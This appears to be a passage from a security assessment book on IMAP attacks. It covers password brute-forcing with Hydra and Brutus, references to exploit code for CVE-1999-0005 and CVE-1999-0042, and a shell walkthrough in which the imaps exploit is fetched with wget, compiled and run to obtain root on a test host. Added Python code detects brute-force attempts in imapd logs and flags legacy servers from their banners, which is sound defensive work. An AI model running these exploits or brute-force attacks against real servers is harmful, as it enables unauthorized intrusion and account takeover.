Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage their email. Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP, which currently uses IMAP4rev1 as the standard server protocol (RFC 3501).

10.4.1 IMAP Brute Force

As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and Hydra do an excellent job brute-forcing valid user-account passwords from both Unix-based and Win32 GUI environments. As mentioned earlier, they can be downloaded from:
Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attack because they don't pay attention to account lockout policies and often don't log unsuccessful authentication attempts.

10.4.2 IMAP Process Manipulation Attacks

Since 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized, which are summarized in Table 10-5.
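Where an IMAP daemon does record failed logins, the password-grinding pattern described above is easy to pick out of the log: one source address, many failures, many different usernames. The following is an added detection example, not code from the book or from the UW IMAP project. The log lines are constructed and follow the syslog style that UW imapd uses for its "Login failure user=... host=..." messages; treat the exact field layout as an assumption and check it against your own server's output before relying on the regular expression.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log (not real traffic). 192.0.2.10 walks through several
# usernames with one failure each; 192.0.2.55 is a legitimate user who
# mistypes a password once between two successful logins.
SAMPLE_LOG = """\
Mar  3 13:16:02 mail imapd[4012]: Login failure user=alice auth=alice host=attacker.example [192.0.2.10]
Mar  3 13:16:02 mail imapd[4013]: Login failure user=bob auth=bob host=attacker.example [192.0.2.10]
Mar  3 13:16:03 mail imapd[4014]: Login failure user=carol auth=carol host=attacker.example [192.0.2.10]
Mar  3 13:16:03 mail imapd[4015]: Login failure user=dave auth=dave host=attacker.example [192.0.2.10]
Mar  3 13:16:04 mail imapd[4016]: Login failure user=erin auth=erin host=attacker.example [192.0.2.10]
Mar  3 13:16:05 mail imapd[4017]: Login user=frank host=laptop.example [192.0.2.55]
Mar  3 13:16:09 mail imapd[4018]: Login failure user=frank auth=frank host=laptop.example [192.0.2.55]
Mar  3 13:16:20 mail imapd[4019]: Login user=frank host=laptop.example [192.0.2.55]
"""

# Assumed imapd message format: "Login user=..." on success and
# "Login failure user=..." on failure, with the client IP in trailing brackets.
LINE_RE = re.compile(
    r"imapd\[\d+\]: Login (?P<result>failure )?user=(?P<user>\S+).*\[(?P<ip>[0-9.]+)\]"
)


def parse_imap_auth_events(text):
    """Turn raw syslog text into a list of {ip, user, failed} dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not an imapd login event; ignore
        events.append({
            "ip": m.group("ip"),
            "user": m.group("user"),
            "failed": m.group("result") is not None,
        })
    return events


def find_brute_force_sources(events, min_failures=3, min_distinct_users=2):
    """Report source IPs whose failures look like password grinding.

    Requiring several distinct usernames separates a dictionary run from a
    single user who simply forgot a password; tune both thresholds to the
    size of the user population and the log volume you see.
    """
    failures = Counter()
    users = defaultdict(set)
    for ev in events:
        if ev["failed"]:
            failures[ev["ip"]] += 1
            users[ev["ip"]].add(ev["user"])
    return {
        ip: {"failures": n, "users": sorted(users[ip])}
        for ip, n in failures.items()
        if n >= min_failures and len(users[ip]) >= min_distinct_users
    }


if __name__ == "__main__":
    for ip, info in find_brute_force_sources(parse_imap_auth_events(SAMPLE_LOG)).items():
        print(f"{ip}: {info['failures']} failed logins across users {info['users']}")
```

The same two functions work on a live syslog feed if you replace SAMPLE_LOG with the file contents; because the page notes that many IMAP servers do not log failures at all, the first thing to verify on a server you defend is that lines of this shape actually appear when a login fails.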
The serious unauthenticated vulnerabilities in IMAP services are CVE-1999-0005 and CVE-1999-0042. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:
The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz. After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.

Example 10-11. The IMAP2bis LOGIN command overflow in action

# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz
# tar xfz imaps.tar.gz
# cd imaps
# make
cc -O2 -o imaps imaps.c
imaps.c: In function `imap':
imaps.c:35: warning: function returns address of local variable
# ls
hey.sh  imaps*  imaps.c  include/  makefile  other/  readme
# ./imaps 192.168.0.35 100
Connecting to 192.168.0.35 on port 143.
* OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02
id;
uid=0(root) gid=0(root) groups=0(root)
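The greeting line in Example 10-11 is what tells an assessor (or an administrator doing an inventory) that the host is still running the older IMAP2bis service rather than the current IMAP4rev1 server. The following is an added example, not code from the book or from UW IMAP, that parses IMAP greeting banners collected from your own servers and sorts them into "legacy protocol", "version to check against Table 10-5 / vendor advisories" and "unrecognised". The first sample banner is the one shown in Example 10-11; the other two are constructed, and the bracketed CAPABILITY layout of the second is an assumption about later UW IMAP releases rather than a quoted server response.

```python
import re

# Constructed sample greetings. Only the first is taken from Example 10-11.
SAMPLE_BANNERS = [
    "* OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02",
    "* OK [CAPABILITY IMAP4REV1 LITERAL+ AUTH=PLAIN] mail.example.org IMAP4rev1 2004.357 at Wed, 5 Jan 2005 10:00:00 +0000",
    "* OK Dovecot ready.",
]

# Assumed UW IMAP greeting shape:
#   "* OK [optional capability list] <host> <IMAP2bis|IMAP4rev1> [Service] <version> at <date>"
BANNER_RE = re.compile(
    r"^\* OK (?:\[[^\]]*\] )?(?P<host>\S+) (?P<protocol>IMAP2bis|IMAP4rev1)(?: Service)? (?P<version>\S+)"
)


def parse_imap_greeting(banner):
    """Extract host, protocol family and version string from a UW IMAP greeting.

    Returns protocol/version as None when the banner is not in the UW IMAP
    style (e.g. another IMAP implementation or a banner that has been hidden).
    """
    m = BANNER_RE.match(banner.strip())
    if not m:
        return {"host": None, "protocol": None, "version": None}
    return {"host": m.group("host"), "protocol": m.group("protocol"), "version": m.group("version")}


def classify_imap_server(banner):
    """Map a greeting to a triage bucket for a server you administer.

    'legacy-protocol'  : IMAP2bis, the pre-IMAP4rev1 service shown exploited
                         in Example 10-11; plan an upgrade regardless of version.
    'check-version'    : IMAP4rev1 with a visible version; compare it with
                         Table 10-5 and the vendor's advisories (not encoded
                         here, because the table is not reproduced on this page).
    'unrecognised'     : not a UW IMAP style banner; identify by other means.
    """
    info = parse_imap_greeting(banner)
    if info["protocol"] == "IMAP2bis":
        return "legacy-protocol"
    if info["protocol"] == "IMAP4rev1":
        return "check-version"
    return "unrecognised"


def audit_banners(banners):
    """Return {banner: (bucket, version)} for a list of collected greetings."""
    return {b: (classify_imap_server(b), parse_imap_greeting(b)["version"]) for b in banners}


if __name__ == "__main__":
    for banner, (bucket, version) in audit_banners(SAMPLE_BANNERS).items():
        print(f"{bucket:16} version={version!s:10} {banner[:60]}")
```

Feeding this the greeting lines your own servers return (captured during a scheduled inventory, not from third-party hosts) gives a quick list of which IMAP daemons still advertise the IMAP2bis service and which need their IMAP4rev1 version compared against the published vulnerability list.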